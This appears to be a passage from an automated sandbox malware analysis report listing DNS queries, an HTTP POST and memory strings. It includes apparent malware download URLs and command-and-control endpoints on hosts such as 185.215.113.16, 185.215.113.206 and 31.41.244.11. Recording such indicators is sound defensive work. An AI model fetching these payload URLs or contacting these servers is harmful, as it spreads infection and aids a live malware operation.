Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ipc:first-content-process-createdresource://gre/modules/amManager.sys.mjssitepermsaddon-provider-registeredspeculativeConnectWithOriginAttributes@mozilla.org/spellchecker/engine;1@mozilla.org/network/file-output-stream;1https://smartblock.firefox.etp/play.svg@mozilla.org/addons/addon-manager-startup;1resource://gre/modules/addons/XPIProvider.jsmwebcompat-reporter@mozilla.org.xpiFileUtils_closeSafeFileOutputStream://static.chartbeat.com/js/chartbeat.js://static.criteo.net/js/ld/publishertag.js://.imgur.com/js/vendor..bundle.js://libs.coremetrics.com/eluminate.js://track.adform.net/serving/scripts/trackpoint/@mozilla.org/network/atomic-file-output-stream;1://auth.9c9media.ca/auth/main.js://.imgur.io/js/vendor..bundle.jsresource://gre/modules/FileUtils.sys.mjs://www.rva311.com/static/js/main..chunk.js://c.amazon-adsystem.com/aax2/apstag.js://connect.facebook.net//all.js://www.everestjs.net/static/st.v3.js://connect.facebook.net//sdk.jspictureinpicture%40mozilla.org:1.0.0@mozilla.org/network/safe-file-output-stream;1*://static.chartbeat.com/js/chartbeat_video.jshttps://smartblock.firefox.etp/facebook.svgresource://gre/modules/TelemetryStorage.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.2880681828.000001DEFA65E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com- equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.2925250004.000001DEF10F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: atten-supporse.biz
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: youtube.com
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: home.twentykx20pt.top
Source: global traffic	DNS traffic detected: DNS query: www.facebook.com
Source: global traffic	DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic	DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic	DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic	DNS traffic detected: DNS query: www.reddit.com
Source: global traffic	DNS traffic detected: DNS query: twitter.com
Source: global traffic	DNS traffic detected: DNS query: reddit.map.fastly.net

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz

Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: a6f0d09f38.exe, 0000000D.00000003.2901005763.0000000001242000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2901005763.0000000001258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: a6f0d09f38.exe, 0000000D.00000002.2954316524.000000000113A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeI
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeze
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe7
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe:
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeC
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeo
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exe
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exeR
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpG
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpw
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206?
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.2957851747.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2957851747.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/6802601040/SxQyhJr.exe
Source: skotes.exe, 00000006.00000002.2957851747.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/6802601040/SxQyhJr.exeD
Source: skotes.exe, 00000006.00000002.2957851747.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/6802601040/SxQyhJr.exeshqos.dll
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/unique1/random.exe
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/unique2/random.exe
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/unique2/random.exe1
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/unique2/random.exe1aa;
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/unique2/random.exe6%
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/unique2/random.exe60N
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/unique2/random.exe60ac02b4ded8abeee1fbdemp
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/unique2/random.exe7d
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/unique2/random.exe7d1
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/unique2/random.exed
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/unique2/random.exeedQ
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/unique2/random.exej
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001C.00000002.3012755816.000001DEEACC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEBD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB96A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2875741877.000001DEFABD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA38A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA38A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/regular-expressionsp
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA38A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/strings
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://home.twentykx20pt.top/bugEWhhZIPIipxajeFf736
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.twentykx20pt.top/bugEWhhZIPIipxajeFfO1732855736
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.twentykx20pt.top/bugEWhhZIPIipxajeFfO1732855736http://home.twentykx20pt.top/bugEWhhZIPIi
Source: firefox.exe, 0000001C.00000003.2822675345.000001DEF908F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bestMatchBlockingEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledhttp://mozilla.org/#/properties/mdnFeatureGate
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/experimentType
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/exposureResults
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/isBestMatchExperiment
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/merinoClientVariants
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/merinoEndpointURL
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/merinoProviders
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/originsAlternativeEnable
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/originsDaysCutOff
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/pagesAlternativeEnable
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/pagesHalfLifeDays
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/pagesHighWeight
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/pagesLowWeight
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/pagesMediumWeight
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/pagesNumSampledVisits
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/pocketFeatureGate
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCap
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndex
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenario
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMap
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/showExposureResults
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 0000001C.00000003.2754238638.000001DEF705F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2728904832.000001DEEEC71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2758502866.000001DEF6A31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2786698706.000001DEEF9FE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2828014808.000001DEF6A28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2812300663.000001DEF05CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2729546937.000001DEEEC71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755426525.000001DEF6930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3047167053.000001DEEC13C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC962000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756065289.000001DEF6A89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756197782.000001DEF6AB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2847420090.000001DEF6AAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2833254348.000001DEF0316000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2920506033.000001DEF124C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2786698706.000001DEEF9D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755005207.000001DEF702A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3057071342.000001DEEC977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001C.00000003.2894687735.000001DEF7046000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB946000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0W
